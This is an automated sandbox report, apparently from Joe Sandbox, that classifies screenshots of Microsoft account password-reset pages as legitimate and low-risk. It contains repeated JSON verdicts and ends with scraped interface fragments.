| URL: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fusername%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d937652 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Recover your account",
"prominent_button_name": "Next",
"text_input_field_labels": [
"bob@"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fusername%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d937652 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/oauth20_authorize.srf%3fusername%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dbob%2540bobco.com%26client_id%3d4765445b-32c6-49b0-83e6-1d937652 Model: Joe Sandbox AI | ```json{ "legit_domain": "live.com", "classification": "wellknown", "reasons": [ "The URL 'account.live.com' is a subdomain of 'live.com', which is a legitimate domain owned by Microsoft.", "Microsoft is a well-known brand, and 'live.com' is associated with Microsoft's services.", "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.", "The presence of 'account' as a subdomain is consistent with Microsoft's use of subdomains for account management." ], "riskscore": 1} |
URL: account.live.com
Brands: Microsoft
Input Fields: bob@ |
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "We need to verify your identity",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email bob@bobco.com",
"Use my security question"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "We need to verify your identity",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email bob@bobco.com",
"Use my security question"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "We need to verify your identity",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email bob@bobco.com",
"Use my security question"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | ```json{ "legit_domain": "live.com", "classification": "wellknown", "reasons": [ "The URL 'account.live.com' is a subdomain of 'live.com', which is a legitimate domain owned by Microsoft.", "Microsoft is a well-known brand, and 'live.com' is commonly associated with Microsoft services.", "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.", "The presence of input fields for email and security questions is typical for account-related services provided by Microsoft." ], "riskscore": 1} |
URL: account.live.com
Brands: Microsoft
Input Fields: Email bob@bobco.com, Use my security question |
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | ```json{ "legit_domain": "live.com", "classification": "wellknown", "reasons": [ "The URL 'account.live.com' is a subdomain of 'live.com', which is a legitimate domain owned by Microsoft.", "Microsoft is a well-known brand, and 'live.com' is commonly associated with Microsoft services.", "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.", "The presence of input fields for email and security questions is typical for account management pages, which aligns with the URL 'account.live.com'." ], "riskscore": 1} |
URL: account.live.com
Brands: Microsoft
Input Fields: Email bob@bobco.com, Use my security question |
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify your identity",
"prominent_button_name": "Next",
"text_input_field_labels": "Mother's maiden name",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verify your identity",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Mother's maiden name?"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://account.live.com/password/reset?wreply=https%3A%2F%2Flogin.live.com%2Foauth20_authorize.srf%3Fusername%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26username%3Dbob%2540bobco.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93 Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
Edit tour
chrome.exe (PID: 1996 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node